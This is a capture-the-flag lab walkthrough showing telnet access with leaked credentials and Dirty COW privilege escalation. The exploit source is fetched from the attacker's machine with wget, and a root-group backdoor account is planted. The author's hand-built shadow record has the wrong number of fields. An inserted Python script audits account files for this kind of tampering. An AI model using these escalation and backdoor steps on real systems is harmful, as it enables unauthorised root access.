The first thing we will need to do after deploying our target is to scan it. I am going to use Nmap to scan the target.
nmap -p- -sV -T4 --reason 10.10.82.235
-p- scans all TCP ports, not just the default top 1000.
-sV probes each open port to identify the service and version running on it.
-T4 sets the timing template, i.e. how fast you want to scan. T5 is the fastest, but can sometimes produce false positives.
--reason tells you why Nmap thinks a port is open or filtered.
Our first question asks us what old, deprecated protocol and service is running. That is telnet on port 23. When logging in via telnet, the username and password are sent in cleartext, so anyone sniffing the network traffic could read them and then use them to log into the telnet server themselves.
Now let's try to log in to the telnet port. If you don't have a telnet client installed, run sudo apt-get install telnet.
telnet 10.10.82.235 23
Wow, someone left us cookies and milk in the form of a username and password! Let's log in to the telnet server.
We even get a shell now! Go ahead and answer the question about the credential.
Now we need to figure out what distribution of Linux we have logged into. We can use the command cat /etc/*release to get the information we need. You can use the DISTRIB_ID and DISTRIB_RELEASE as the answer.
Now let’s check out the cookies and milk file. It gives us the answer to the next question at the top.
cat cookies_and_milk.txt
The next part talks about using the dirtycow exploit, so let’s grab the source code and copy it over to our target.
nano exploit.c
Now paste in the code from the link below, but be sure to remove the ###dirtyc0w.c### line. Otherwise this won't compile correctly.
https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c
Save the file; next we need to get it onto the target machine. Serve it up with a Python web server on your attacker machine using
python3 -m http.server 7777
Now on our target machine we logged into we can use wget to grab the file.
wget http://10.6.43.108:7777/DirtyCow.c
Now we need to compile the exploit. Looking at the exploit code, we see instructions in the comments about how to compile and run it.
Running the exploit shows that it takes two arguments: a target_file and the new_content to write into that file. We can use this to make our own hacker user, then give that user a password hashed with MD5 in the /etc/shadow file.
First let’s choose a super awesome password.
SuperAwesomeSecretPassword
Now we need to create the hash. We can use openssl on the target machine for this:
openssl passwd -1
Now type your password and then verify it
SuperAwesomeSecretPassword
The /etc/shadow file has a specific format: one colon-separated record per user.
Let's create this line for our hacker user.
nano shadow
hacker:$1$ycKKl9ef@jyRAd.w0bXOpzTQTDM9///:1:1:5:3:2:9999:7:::
The hash field is the value openssl produced from our password.
Save that and let’s make a new passwd file.
Take this picture as an example
nano passwd
hacker:x:99:0:hacker:/root:/bin/bash
99 is the user ID (UID), chosen so it doesn't conflict with any existing account
0 is the primary group ID (GID), which is the root group
hacker is our user description. Don’t do this on real engagements!
/root is the home directory for this user
/bin/bash is the shell we want to give the user.
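The two records above are exactly what a defender should be looking for on a host after an incident: a second account whose primary group is root, whose home is /root, or whose hash uses MD5-crypt (what openssl passwd -1 produces), and shadow lines with the wrong number of fields. The following audit script is an added example, not part of the original walkthrough or of either Dirty COW repository. It parses passwd- and shadow-style text using the 7- and 9-field layouts described above and reports the anomalies; the sample records, the account names hacker, backdoor and svc, and the hash values are constructed for the demonstration.

```python
"""Audit /etc/passwd and /etc/shadow style records for signs of account
tampering.  Added example code; the sample records below are constructed."""
from dataclasses import dataclass

PASSWD_FIELDS = 7   # name:x:uid:gid:gecos:home:shell
SHADOW_FIELDS = 9   # name:hash:lastchg:min:max:warn:inactive:expire:reserved

# `openssl passwd -1` produces $1$ (MD5-crypt), which is considered weak today.
WEAK_HASH_PREFIXES = {"$1$": "MD5-crypt"}
STRONG_HASH_PREFIXES = ("$5$", "$6$", "$y$", "$2a$", "$2b$", "$2y$", "$7$")

# Constructed sample input modelled on the files built in the walkthrough.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hacker:x:99:0:hacker:/root:/bin/bash
backdoor:x:0:0:backdoor:/home/backdoor:/bin/sh
svc:x:1001:1001:svc:/home/svc:/bin/bash
"""
SHADOW_SAMPLE = """\
root:$6$saltsalt$N0tAR3alHash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
hacker:$1$ycKKl9ef$N0tAR3alHash:19000:0:99999:7:::
backdoor::19000:0:99999:7:::
svc:$1$abc$def:1:1:5:3:2:9999:7:::
"""


@dataclass
class Finding:
    severity: str
    account: str
    message: str


def parse_records(text, expected_fields):
    """Split a colon-separated account file into records, keeping a list of
    (lineno, name, field_count) for lines with the wrong number of fields."""
    records, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != expected_fields:
            malformed.append((lineno, fields[0], len(fields)))
        else:
            records.append(fields)
    return records, malformed


def classify_hash(h):
    """Classify a shadow hash field by its crypt(3) prefix."""
    if h == "":
        return "empty"            # no password required at all
    if h.startswith(("*", "!")):
        return "locked"
    for prefix, name in WEAK_HASH_PREFIXES.items():
        if h.startswith(prefix):
            return name
    if h.startswith(STRONG_HASH_PREFIXES):
        return "strong"
    if len(h) == 13 and "$" not in h:
        return "DES-crypt"
    return "unknown"


def audit(passwd_text, shadow_text):
    """Return a list of Finding objects for suspicious passwd/shadow records."""
    findings = []
    passwd, bad_passwd = parse_records(passwd_text, PASSWD_FIELDS)
    shadow, bad_shadow = parse_records(shadow_text, SHADOW_FIELDS)
    for lineno, name, n in bad_passwd:
        findings.append(Finding("high", name, f"passwd line {lineno} has {n} fields, expected {PASSWD_FIELDS}"))
    for lineno, name, n in bad_shadow:
        findings.append(Finding("high", name, f"shadow line {lineno} has {n} fields, expected {SHADOW_FIELDS}"))

    for name, pw, uid, gid, _gecos, home, _shell in passwd:
        if uid == "0" and name != "root":
            findings.append(Finding("critical", name, "UID 0 account other than root"))
        if gid == "0" and name != "root":
            findings.append(Finding("high", name, "primary group is root (GID 0)"))
        if home == "/root" and name != "root":
            findings.append(Finding("high", name, "home directory is /root"))
        if pw != "x":
            findings.append(Finding("high", name, f"passwd hash field is {pw!r}, not the shadow marker 'x'"))

    for name, h, *_ in shadow:
        kind = classify_hash(h)
        if kind == "empty":
            findings.append(Finding("critical", name, "empty password hash (no password required)"))
        elif kind in ("MD5-crypt", "DES-crypt", "unknown"):
            findings.append(Finding("medium", name, f"weak or unrecognised hash type: {kind}"))

    known = {r[0] for r in shadow} | {name for _, name, _ in bad_shadow}
    for name, *_ in passwd:
        if name not in known:
            findings.append(Finding("medium", name, "present in passwd but has no shadow entry"))
    return findings


if __name__ == "__main__":
    for f in audit(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(f"[{f.severity:8}] {f.account}: {f.message}")
```

On a real host you would feed it the contents of /etc/passwd and /etc/shadow (the latter needs root to read) and compare the output against a known-good baseline; the hacker record is caught three times here (root group, /root home, MD5-crypt hash) even though its UID is not 0.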
Our 2 files should look like this. Now we can run the exploit.
After running the exploit, the files were not modified. So we need a new dirtycow exploit.
This one claims to make a new user called firefart with either no password or a password of your choosing. Let’s change the username to hacker.
https://github.com/FireFart/dirtycow/blob/master/dirty.c
On line 131 change the username to hacker.
user.username = “hacker”;
Now save it as NewDirtyCow.c and transfer it to the victim machine.
python3 -m http.server 7777
Now on our target machine we logged into we can use wget to grab the file.
wget http://10.6.43.108:7777/NewDirtyCow.c
Let's compile it. The directions in the file say to run
gcc -pthread NewDirtyCow.c -o NewDirtyCow -lcrypt
The above command is the answer to our question, except the question expects the file to simply be called dirty:
gcc -pthread dirty.c -o dirty -lcrypt
It also wants to know the original user that would have been created from this code (https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c)
The answer is FireFart
Now run it using
./NewDirtyCow
Give it a password of Hacker. We now have a root user. Notice when we su to hacker, we have a # showing we are a root user!
We can see our user in /etc/passwd. Some of the things I tried earlier seem to have messed up sudo for us, but we are a root user at this point.
We still don’t have the flag though, so let’s cd into /root
There is a message from the grinch in there. Cat out the file.
Now we need to create a file called coal in that directory and finally pipe the output of tree into md5sum.
touch coal
tree | md5sum
Another day down!!!